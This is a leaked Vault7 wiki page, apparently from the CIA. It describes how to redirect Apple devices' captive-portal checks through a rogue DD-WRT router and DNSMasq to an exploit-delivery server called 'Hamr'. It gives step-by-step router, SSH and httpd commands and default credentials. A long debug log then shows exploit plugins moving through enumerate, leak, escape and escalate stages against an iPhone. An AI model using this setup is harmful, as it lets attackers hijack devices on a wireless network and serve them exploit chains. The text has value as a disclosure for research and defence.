Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Captive Portal
Summary
The following is the setup for a DNSDomain Name System server designed to trick a device to launch its captive portal window. The idea is that we want the DNSDomain Name System server to forward requests for captive.apple.com/hotspot-detect.html to mdbtest.devlan.net/captive.html. Captive.html can then forward the the device to our machine running Hamr.
Set Up
The wireless router configured for captive portal is CaptivationStation. The device can be accessed at 192.168.1.1. The admin user name for the device is "Captive". The router forwards all requests for captive.apple.com/hotspot-detect.html to WildTurkey at 10.2.3.105.
WildTurkey is configured as a webserver that contains hotspot-detect.html. Apple devices try to connect to the hotspot-detect.html file. We use this file to forward users to mdbtest.devlan.net/captive.html. The html file is located at:
/var/www/html/hotspot-detect.html
This file forwards devices to the captive.html file which is in the same directory.
Adding Your Machine to Captive.html
1) SSHSecure Shell into adm_mdb@wildturkey.devlan.net
2) cd into "/var/www/html/"
3) sudo vim captive.html (Note: you MUST use sudo)
4) add a line like the following:
<h2><a href="http://[Your IP]:8080/?id=myt">[Your Name]</a></h2>
Logging on to Captivation Station
1) Connect to CaptivationStation with the password
2) The device should connect and launch the captive portal
3) Click on your machine
4) To get out hit "cancel" and then "Use Other Network"
** If captive portal does not open on subsequent tries, tell the device to forget the network. This is a known issue it you selected "Use Without Internet" **
New Captive Portal
- Browse to 192.168.1.1, log into your router, and go to Administration/Backup. For a factory reset router, these are the default configurations:
- SSID: dd-wrt (no password)
- Configuration page username/password: admin/admin
- Restore the router with this back up file: nvrambak.bin
- Once the router restarts, connect to TestivationStation with its password (the new SSIDService Set Identifier (Wireless Network) of your router)
- Note: all passwords are the same as CaptiveationStation
- Log back into your router using the username Captive and its password
-
Verify that the new settings have been restored by going to Services/Services and make sure DNSMasq has the following entry
address=/captive.apple.com/192.168.1.1 -
SSH into the router
ssh root@192.168.1.1
password is the same one used for logging into the web configuration
-
SCP hotspot-detect.html and captive.html over to /tmp/root on the router
ex. scp ~/Desktop/captive.html root@192.168.1.1:/tmp/root -
Run the following commands on the router
root@DD-WRT:~# killall httpd root@DD-WRT:~# httpd -p 80 -h /tmp/root/ root@DD-WRT:~# httpd -p 81Line 2 allows the files in /tmp/root to be served to the browser on port 80 (ex. 192.168.1.1/captive.html)
- Line 3 enables you to be able to configure the router using port 81. You MUST use 192.168.1.1:81 to access the router configuration page.
- At this point you should be able to hit the captive portal on an iDevice
Issues
** This is from old testing ~8/19 **
Initially there was an issue with the the Safari_UA String. The captive portal returns line 1 below, but the regex expects something like line 2. I made the Version and Safari fields optional now. There should be a features/captive-portal branch with the modified code.
Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143
Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Now the issue seems to be in Earth's sethw function, or something along those lines. The is the output from McNugget. It does not advance any further
User #71498@Bens-MacBook-Pro:mcnugget$ ./mctest
Execution Passphrase:
Turning off cookie support
mctest: MC | INFO: Cookie support turned off
Cookie support turned off
[18/Aug/2015:15:29:44] ENGINE Listening for SIGINT.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Listening for SIGINT.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGINT.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGINT.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGHUP.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Listening for SIGHUP.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGHUP.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGHUP.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGTERM.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Listening for SIGTERM.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGTERM.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGTERM.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGUSR1.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Listening for SIGUSR1.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGUSR1.
[18/Aug/2015:15:29:44] ENGINE Listening for SIGUSR1.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Bus STARTING
[18/Aug/2015:15:29:44] ENGINE Bus STARTING
[18/Aug/2015:15:29:44] ENGINE Bus STARTING
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Started monitor thread 'Autoreloader'.
[18/Aug/2015:15:29:44] ENGINE Started monitor thread 'Autoreloader'.
[18/Aug/2015:15:29:44] ENGINE Started monitor thread 'Autoreloader'.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Started monitor thread '_TimeoutMonitor'.
[18/Aug/2015:15:29:44] ENGINE Started monitor thread '_TimeoutMonitor'.
[18/Aug/2015:15:29:44] ENGINE Started monitor thread '_TimeoutMonitor'.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Serving on 0.0.0.0:8080
[18/Aug/2015:15:29:44] ENGINE Serving on 0.0.0.0:8080
[18/Aug/2015:15:29:44] ENGINE Serving on 0.0.0.0:8080
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Bus STARTED
[18/Aug/2015:15:29:44] ENGINE Bus STARTED
[18/Aug/2015:15:29:44] ENGINE Bus STARTED
mctest: MC | 10.3.2.74 | myid | | new session created with id = '2bfc300a-e757-4307-a2a4-709bccd5ff65'
new session created with id = '2bfc300a-e757-4307-a2a4-709bccd5ff65'
mctest: MC | 10.3.2.74 | myid | | plugin 'Eve 1.0' match failed because next stage 'enumerate' not in match stages (leak, access)
plugin 'Eve 1.0' match failed because next stage 'enumerate' not in match stages (leak, access)
mctest: MC | 10.3.2.74 | myid | | plugin 'iOS Sol' match failed because next stage 'enumerate' not in match stages (escape, escalate)
plugin 'iOS Sol' match failed because next stage 'enumerate' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | | plugin 'iOS Sol' match failed because next stage 'enumerate' not in match stages (escape, escalate)
plugin 'iOS Sol' match failed because next stage 'enumerate' not in match stages (escape, escalate)
('~~~~~~UA String: %s', 'Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143')
mctest: MC | 10.3.2.74 | myid | | plugin 'Earth 1.1' match failed because next stage 'enumerate' not in match stages (leak, access)
plugin 'Earth 1.1' match failed because next stage 'enumerate' not in match stages (leak, access)
mctest: MC | 10.3.2.74 | myid | | plugin 'Archon 1.2' match failed because match dict['os_version'] = 'None'
plugin 'Archon 1.2' match failed because match dict['os_version'] = 'None'
mctest: MC | 10.3.2.74 | myid | | plugin 'User #71895 1.0' match failed because match dict['os_version'] = 'None'
plugin 'User #71895 1.0' match failed because match dict['os_version'] = 'None'
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' selected with score 0.5
plugin 'Safari User-Agent Enumeration' selected with score 0.5
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' state machine: request -> None
plugin 'Safari User-Agent Enumeration' state machine: request -> None
mctest: MC | 10.3.2.74 | myid | | plugin state: next id = none, next size = 9223372036854775807, next stage = leak, next type = content, next dict = {'browser': 'Safari', 'language': None, 'os_version': '8_4', 'version': None, 'cpu_type': 'CPU', 'device': 'iPhone', 'os_type': 'iPhone OS', 'safari_version': None, 'webkit_version': '600.1.4', 'build': '12H143'}
plugin state: next id = none, next size = 9223372036854775807, next stage = leak, next type = content, next dict = {'browser': 'Safari', 'language': None, 'os_version': '8_4', 'version': None, 'cpu_type': 'CPU', 'device': 'iPhone', 'os_type': 'iPhone OS', 'safari_version': None, 'webkit_version': '600.1.4', 'build': '12H143'}
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' is finished
plugin 'Safari User-Agent Enumeration' is finished
mctest: MC | 10.3.2.74 | myid | | plugin 'Eve 1.0' match failed because next plugin type 'content' not in match plugin types (html, javascript)
plugin 'Eve 1.0' match failed because next plugin type 'content' not in match plugin types (html, javascript)
mctest: MC | 10.3.2.74 | myid | | plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | | plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' match failed because next stage 'leak' not in match stages (enumerate)
plugin 'Safari User-Agent Enumeration' match failed because next stage 'leak' not in match stages (enumerate)
('~~~~~~UA String: %s', 'Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143')
mctest: MC | 10.3.2.74 | myid | | plugin 'Earth 1.1' match failed because next plugin type 'content' not in match plugin types (html, javascript)
plugin 'Earth 1.1' match failed because next plugin type 'content' not in match plugin types (html, javascript)
mctest: MC | 10.3.2.74 | myid | | plugin 'User #71895 1.0' match failed because match dict['os_version'] = '8_4'
plugin 'User #71895 1.0' match failed because match dict['os_version'] = '8_4'
mctest: MC | 10.3.2.74 | myid | | plugin 'Archon 1.2' selected with score 0.5
plugin 'Archon 1.2' selected with score 0.5
mctest: MC | 10.3.2.74 | myid | | plugin 'Archon 1.2' state machine: request -> set_bititude
plugin 'Archon 1.2' state machine: request -> set_bititude
mctest: MC | INFO: 10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid HTTP/1.1" 200 495 "http://captive.apple.com/hotspot-detect.html" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid HTTP/1.1" 200 495 "http://captive.apple.com/hotspot-detect.html" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid HTTP/1.1" 200 495 "http://captive.apple.com/hotspot-detect.html" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin looped with no response 1 time(s)
plugin looped with no response 1 time(s)
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Archon 1.2' state machine: set_bititude -> None
plugin 'Archon 1.2' state machine: set_bititude -> None
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin state: next id = none, next size = 9223372036854775807, next stage = leak, next type = javascript, next dict = {'browser': 'Safari', 'language': None, 'bititude': '64', 'os_version': '8_4', 'version': None, 'cpu_type': 'CPU', 'device': 'iPhone', 'os_type': 'iPhone OS', 'safari_version': None, 'webkit_version': '600.1.4', 'build': '12H143'}
plugin state: next id = none, next size = 9223372036854775807, next stage = leak, next type = javascript, next dict = {'browser': 'Safari', 'language': None, 'bititude': '64', 'os_version': '8_4', 'version': None, 'cpu_type': 'CPU', 'device': 'iPhone', 'os_type': 'iPhone OS', 'safari_version': None, 'webkit_version': '600.1.4', 'build': '12H143'}
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Archon 1.2' is finished
plugin 'Archon 1.2' is finished
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Eve 1.0' match failed because match dict['os_version'] = '8_4'
plugin 'Eve 1.0' match failed because match dict['os_version'] = '8_4'
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Safari User-Agent Enumeration' match failed because next stage 'leak' not in match stages (enumerate)
plugin 'Safari User-Agent Enumeration' match failed because next stage 'leak' not in match stages (enumerate)
('~~~~~~UA String: %s', 'Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143')
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Archon 1.2' not matching because 'bititude' already set.
plugin 'Archon 1.2' not matching because 'bititude' already set.
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'User #71895 1.0' match failed because match dict['os_version'] = '8_4'
plugin 'User #71895 1.0' match failed because match dict['os_version'] = '8_4'
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Archon 1.2' not matching because 'bititude' already set.
plugin 'Archon 1.2' not matching because 'bititude' already set.
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Earth 1.1' selected with score 0.99
plugin 'Earth 1.1' selected with score 0.99
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | Earth: fetching index
Earth: fetching index
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | Getting the desired content type: 6
Getting the desired content type: 6
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Earth 1.1' state machine: request -> mainjs
plugin 'Earth 1.1' state machine: request -> mainjs
mctest: MC | INFO: 10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65&n=c5 HTTP/1.1" 200 212 "http://10.3.2.101:8080/?id=myid" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65&n=c5 HTTP/1.1" 200 212 "http://10.3.2.101:8080/?id=myid" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65&n=c5 HTTP/1.1" 200 212 "http://10.3.2.101:8080/?id=myid" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin looped with no response 1 time(s)
plugin looped with no response 1 time(s)
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Earth 1.1' state machine: mainjs -> sethw
plugin 'Earth 1.1' state machine: mainjs -> sethw
mctest: MC | INFO: 10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65 HTTP/1.1" 200 6791 "http://10.3.2.101:8080/?id=myid" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65 HTTP/1.1" 200 6791 "http://10.3.2.101:8080/?id=myid" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65 HTTP/1.1" 200 6791 "http://10.3.2.101:8080/?id=myid" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | target reported status 770
target reported status 770
mctest: MC | INFO: 10.3.2.74 - - [18/Aug/2015:15:29:51] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65&status=770 HTTP/1.1" 200 - "http://10.3.2.101:8080/?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
10.3.2.74 - - [18/Aug/2015:15:29:51] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65&status=770 HTTP/1.1" 200 - "http://10.3.2.101:8080/?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
10.3.2.74 - - [18/Aug/2015:15:29:51] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65&status=770 HTTP/1.1" 200 - "http://10.3.2.101:8080/?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65" "Mozilla/5.0 (iPhone; CPU iPhone OSOperating System 8_4 like Mac OSOperating System X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"